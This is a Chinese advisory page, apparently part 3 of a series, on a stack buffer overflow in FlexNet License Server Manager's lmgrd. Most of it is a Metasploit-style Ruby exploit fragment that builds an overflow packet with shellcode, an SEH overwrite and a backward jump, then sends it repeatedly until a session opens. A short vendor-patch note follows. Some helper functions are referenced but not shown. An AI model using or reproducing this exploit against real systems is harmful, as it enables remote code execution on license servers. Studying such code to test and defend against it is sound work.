FlexNet License Server Manager 'lmgrd' 组件栈缓冲区溢出(3)

def exploit
    i = 1
    while i <= datastore['Attempts'] and not session_created?
      print_status("Attempt #{i}/#{datastore['Attempts']} to exploit...")
      do_exploit
      sleep(datastore['Wait'])
      i = i + 1
    end

if not session_created?
      print_error("Exploit didn't work after #{i} attempts")
    end
  end

def do_exploit
    t = framework.threads.spawn("jam", false) { jam }
    my_payload = payload.encoded

header_length = 20 # See create_packet() to understand this number
    pkt_data = ""
    if target.name =~ /Debug/
      pkt_data << "a" * (65535 - header_length)
    else
      pkt_data << "a" * (target['ShellcodeOffset'])
      pkt_data << my_payload
      pkt_data << "b" * (target['Offset']-target['ShellcodeOffset']-my_payload.length)
      pkt_data << generate_seh_record(target.ret)
      pkt_data << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-5000").encode_string
      pkt_data << "c" * (65535 - pkt_data.length - header_length)
    end

pkt = create_packet(pkt_data)

connect
    sock.put(pkt)
    handler
    disconnect
  end

end

建议:
--------------------------------------------------------------------------------
厂商补丁:

Flexera
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwzwff.html